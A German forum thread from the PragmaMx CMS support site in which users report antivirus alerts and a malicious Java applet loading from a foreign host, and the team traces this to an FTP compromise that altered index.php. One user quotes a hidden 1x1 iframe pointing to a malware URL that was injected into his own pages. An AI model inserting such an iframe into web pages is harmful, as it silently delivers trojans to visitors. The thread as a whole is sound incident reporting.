pragmaseite mit trojaner??

[Gast]

Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername und Passwort

[maverik]

hallo und guten morgen,

ich hatte gerade eine lustige meldung meines antivirenprogrammes als ich pragma öffnete. Diese meldung bekam ich vor wochen schon einmal. ich mache mir da keine großartigen gedanken drum und schiebe es mal auf die übernervosität meines nod32.
trotzdem möchte ich es euch einmal zeigen.

so long maverik

[gelöscht durch Administrator]

[Metal-Overdrive]

So eine ähnliche Meldung hat mir Kaspersky vor ein paar Tagen auch rausgehauen.

[smartmusic]

ja bekomme diese meldung auch, und die startseite springt nachdem sie vollständig geladen ist automatisch nach unten.

[jubilee]

ja bekomme diese meldung auch, und die startseite springt nachdem sie vollständig geladen ist automatisch nach unten

Tatsächlich wird da irgendetwas geladen.
Muss mal nachsehen woher das kommt. Scheint jedenfalls nicht von dieser Seite zu kommen.
Evt. von einem verlinkten Teil oder Script

Dump classloader list ...
    codebase=http://65.254.37.58/manual/mod/s/, key=http://65.254.37.58/manual/mod/s/,crtdcghcn.jar, zombie=true, cache=true, refcount=0, info=sun.plugin.ClassLoaderInfo@12cc95d

Search results for: 65.254.37.58


OrgName:    Global Net Access, LLC
OrgID:      GNAL-2
Address:    55 Marietta St, NW
Address:    Suite 1720
City:       Atlanta
StateProv:  GA
PostalCode: 30303
Country:    US

ReferralServer: rwhois://rwhois.gnax.net:4321

NetRange:   65.254.32.0 - 65.254.63.255
CIDR:       65.254.32.0/19
NetName:    GNAXNET
NetHandle:  NET-65-254-32-0-1
Parent:     NET-65-0-0-0-0
NetType:    Direct Allocation
NameServer: DNS1.GNAX.NET
NameServer: DNS2.GNAX.NET
Comment:   
RegDate:    2003-12-29
Updated:    2004-03-31

OrgAbuseHandle: ABUSE745-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1-404-230-9150
OrgAbuseEmail:  abuse@gnax.net

OrgTechHandle: ENGIN7-ARIN
OrgTechName:   Engineering
OrgTechPhone:  +1-404-230-9150
OrgTechEmail:  engineering@gnax.net
# ARIN WHOIS database, last updated 2006-12-20 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

[maverik]

na dann scheint mein nod32 doch keine para´s zu haben, wenn da wirklich was im busch ist

  3    40 ms    40 ms    39 ms  217.0.73.186
  4    46 ms    51 ms    52 ms  f-eb5.F.DE.net.DTAG.DE [62.154.17.62]
  5    46 ms    46 ms    47 ms  62.156.139.10
  6    47 ms    46 ms    46 ms  ffm-bb1-link.telia.net [80.91.249.138]
  7    64 ms    57 ms    64 ms  ldn-bb2-link.telia.net [80.91.249.12]
  8   132 ms    64 ms   132 ms  nyk-bb2-pos7-0-0.telia.net [213.248.65.210]
  9   144 ms   141 ms   144 ms  ash-bb1-link.telia.net [80.91.250.17]
 10   140 ms   151 ms   150 ms  atl-bb1-link.telia.net [213.248.80.142]
 11   152 ms   152 ms   152 ms  atl-bb1-link.telia.net [213.248.80.142]
 12   154 ms   153 ms   274 ms  globalnet-103907-atl-bb1.c.telia.net [213.248.90.54]
 13   152 ms   152 ms   155 ms  209.51.131.29
 14   154 ms   154 ms   155 ms  209.51.149.109
 15   152 ms   155 ms   152 ms  thebesthomeloans.net [65.254.37.58]

Ablaufverfolgung beendet.

so long

[jubilee]

Hmmm ...
Ich kanns aber nicht mehr provozieren ?!
Habt ihr den Fehler jetzt noch ?

[maverik]

hiho

das ist insgesamt erst 2 mal bei mir aufgetauscht, so im letzten halben jahr, lässt sich auch leider nicht reproduzieren

mal abwarten ob noch mehr ähnliches verhalten haben

so long maverik

[FrankySZ]

Hi @ll,

hab zwar keine Meldung von meinem Kaspersky bekommen, aber dafuer meckert mein NoScript-Addon fuer FF seit ca. 2tagen rum ... da ich das script nicht erlaubt hab, daher wohl auch keine Meldung von Kaspersky

btw wenn man die 65.254.37.58 im Browser aufruft kommt man zu ner Site die einem sagt dass man cpanel installiert hat ....

[smartmusic]

also nun bekomme ich immer hinweise von firefox bezüglich sexseiten und spuren hinterlassen

und es lädt irgendwas nach

de.drivecleaner.com

yahoo.com

[Oscar175]

Hallo ich hatte eben gerade "Applet BaaaaBaa started"

[maverik]

ok wo wir grad mal bei den ungereimtheiten sind, seamonkey liefert das

was das denn fürn cookie

[gelöscht durch Administrator]

[maverik]

ie7

[gelöscht durch Administrator]

[spike]

das mit dem applet baabaaa startet hatte ich auch gerade...

[jubilee]

applet baabaaa

Jo, auch verseucht.

[cihan]

gestern habe ich auch eine warnung von nav bekommen... in dem moment war ich auf pragmam... habe gar nicht daran gedacht, dass das von pragmam kommt... danach habe ich eine fehlermeldung bekommen, nachdem die seite erstmal sehr langsam wurde... gerade ist die seite wieder sehr langsam geworden, anschliessend wieder die fehlermeldung... nach dem ausblenden des fehlers dauert ein wenig, bis die seite wieder normal läuft.

[gelöscht durch Administrator]

[Metal-Overdrive]

Ich hatte das Problem mit dem IE7. Wollte ein ActiveX Steuerelement installieren. Bisher aber nur 1x in den letzten 3 Tagen aufgetreten. Welche Meldung Kaspersky genau rausgegeben hat weiß ich nicht mehr.

[GerhardSt]

Hallo, bei mir wollte der IE7 gestern auch ein ActiveX Steuerelement installieren um diese Seite richtig darzustellen. Ich schaue diese Seite auf drei verschiedenen Rechnern an, nur diese Meldung bekam ich nur gestern auf einen, obwohl  auf allen XP mit IE7 läuft.

[tuningcar]

Das selbe Problem hatte ich vor drei Wochen auch auf meiner Tuning Seite 

Durch irgendein Sicherheitsloch hatt so ein w... mir in vielen index.html Seiten folgenden Iframe eingefügt :

<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>

Durch den Aufruf dieser Seite in dem Iframe kommt mann zu den Troyaner 

[NeMeSiSX2LC]

Hatte ich noch nicht... Aberwird bald auch der Fall sein... Weil es stehen sehr komische Referrere drin....

[doggie]

da krieg man ja die Panik 

gerade eben hat sich der firefox verabschiedet und eine sexseite hat sich geöffnet.

[jubilee]

gerade eben hat sich der firefox verabschiedet und eine sexseite hat sich geöffnet.

Also, auf unserer Seite ist das Problem bereits seit mehreren Stunden behoben.
Wir werden dazu aber noch etwas schreiben.
MfG

[spike]

hmmm ok nun steht hier recht viel drin.. weiss den nun einer , was sache ist ?

[maverik]

moin

coole sache, hätte gar nicht gedacht das die meldung so einen kreis zieht, hatte eher an einen zu stramm eingestellten nod32 bei mir gedacht

Wir werden dazu aber noch etwas schreiben.

na darauf bin ich gespannt

guts nächtle

maverik

[der_luecke]

wenn wir uns nicht intensiv um unsere Seiten kümmern. Es gab vor einigen Wochen ein kleines Loch in unserem FTP-Server. Das hat sich gleich einer zu Nutze gemacht und wollte uns fürchterlichst quälen. Dieses Loch ist sehr schnell gestopft worden und wir fühlten uns wieder sicher.

Sollte man nicht, denn wir hatten im 0.1.9.er Stress vergessen, unsere alten Passworte zu ändern. Ganz schlechte Idee, denn der/die oder das böse Knabe/Junge/Mädchen/Nase wollte sich hier weiter austoben und den Effekt habt ihr hier gesehen.

Wir wollen uns bei euch bedanken, dass ihr sofort reagiert habt und uns auf diesen Fehler hingewiesen habt. So konnten wir das Schlimmste verhindern.

Euer PragmaMx-Team

[Atze]

Hi,
ich glaub das habe ich auch das Problem. Meine User klagen zumindest: http://www.partyblick.de/modules.php?name=eBoard&file=viewthread&tid=4280&page=1#pid73392

und selbst habe ich das Problem auch gehabt. Das hat der Antivirus gemeldet:
C:Dokumente und EinstellungenAtzeAnwendungsdatenSunJavaDeploymentcachejavapiv1.0jarcrtdcghc n.jar-311fe5cb-778e61e4.zip

Virusname:
T*/Cla***ader.*.4

Hab die Datei einfach löschen lassen.
Bis jetzt ging alles ohne Probleme.

Aber bei den anderen ist es immer noch??
Ist aber erst seit dem Update auf das  neue Java, könnte es damit zusammenhängen?

Gruß


edit by Andi: Virusname unkenntlich gemacht

[GerhardSt]

Hallo Olaf,
wenn ich das hier so lese, haben einige das Problem auch auf Ihrer Seite. Dies ist bei mir zum Glück, noch nicht der Fall.

wenn wir uns nicht intensiv um unsere Seiten kümmern. Es gab vor einigen Wochen ein kleines Loch in unserem FTP-Server. Das hat sich gleich einer zu Nutze gemacht und wollte uns fürchterlichst quälen. Dieses Loch ist sehr schnell gestopft worden und wir fühlten uns wieder sicher.

Kann es sein das durch dieses Loch, auch eure Download´s verändert worden sind, oder sind die wo anders gespeichert?
Gruß Gerhard!
Schöne Feiertage!

[Musicman75]

@ Atze

Es kommt immer noch die Virenmeldung auf deiner Seite. Nur zur Info.

[Andi]

Moin

haben einige das Problem auch auf Ihrer Seite.

Wer noch, ausser Atze? Das bei tuningcar ist was anderes.

Kann es sein das durch dieses Loch, auch eure Download´s verändert worden sind, oder sind die wo anders gespeichert?

Sehr unwahrscheinlich, die wichtigsten Downloads liegen bei Sourceforge.


Jetzt bitte nicht wild rum spekulieren. Bei Atze ist der selbe FTP-Server aktiv wie bei uns, also dürfte er das selbe Problem haben wie wir. Auch der HTML-Quelltext seiner Seite zeigt das gleiche Symptom.

Grundsätzlich bei solchen Verdachten, auf der eigenen Seite, sollte zuerst die Versionsüberwachung aufgerufen werden. Dort sieht man meist sofort, wenn irgendeine .php oder .js Datei die zu pragmaMx gehören verändert wurden.
Bei uns war es die index.php, die verändert wurde, Das System wurde komplett überprüft, sonst ist da nix...
War auch schön im FTP-Logfile zu sehen, wie und was da passiert ist....


Atze, wende dich mal per PM an mich oder Jubilee.

Den Thread schliesse ich jetzt, das Thema ist soweit erledigt.